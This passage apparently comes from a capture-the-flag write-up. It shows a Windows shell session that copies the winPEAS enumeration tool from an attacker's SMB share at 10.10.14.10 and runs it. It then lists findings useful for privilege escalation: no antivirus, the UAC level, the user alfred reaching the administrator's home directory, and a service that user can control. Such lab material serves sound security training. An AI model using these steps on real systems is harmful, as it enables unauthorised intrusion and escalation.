PEAS
c:\tmp>copy \\10.10.14.10\smb\winPEASx86.exe
copy \\10.10.14.10\smb\winPEASx86.exe
1 file(s) copied.
c:\tmp>winPEASx86.exe
winPEASx86.exeExecuting PEAS
Due to the insane amount of hotfixes installed on the target system, the embedded Watson couldn’t find any vulnerability
No AV
UAC is enabled and set to 5
PEAS also enumerated installed .NET versions
It looks like the alfred user is able to access the home directory of the administrator user
This is a very strange case.
the alfred user is able to start and stop the following service; wcncsvc
This scheduled task was enumerated earlier, but It is running with the privileges of the current user. This won’t be of use for PrivEsc
PEAS detected something about Putty SSH, but it looks like the data wasn’t available